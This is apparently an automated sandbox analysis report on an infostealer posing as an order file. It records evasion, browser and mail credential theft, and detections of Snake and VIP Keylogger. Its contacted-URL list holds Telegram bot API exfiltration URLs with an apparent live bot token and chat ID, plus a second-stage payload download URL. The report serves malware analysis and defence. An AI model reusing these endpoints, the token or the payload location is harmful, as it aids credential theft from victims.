Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596247s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00402868 FindFirstFileW, 4_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004065DA FindFirstFileW,FindClose, 4_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004059A9
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599639 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598938 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598469 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598141 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597813 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597688 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596247 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595016 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594891 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594766 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594656 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594437 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594328 Jump to behavior
Source: ORDER 20240986 OA.exe, 00000000.00000002.2287296673.0000000000808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\FE
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dqEmultipart/form-data; boundary=------------------------8dd0b6f4848dbcf<
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dqEmultipart/form-data; boundary=------------------------8dd0b4a7224cc3a<
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00404243 LdrInitializeThunk,SendMessageW, 0_2_00404243
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_6FBB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBB1B63
Enables debug privileges
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Users\user\Desktop\ORDER 20240986 OA.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
167.250.5.91
 sierrassinfinusadas.com.ar Argentina
264649 NUTHOSTSRLAR false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
sierrassinfinusadas.com.ar 167.250.5.91 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		high
    https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery false
      		high
      https://reallyfreegeoip.org/xml/8.46.123.75 false
        		high
        http://checkip.dyndns.org/ false
          		high
          https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin false
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		 unknown
          https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery false
            		high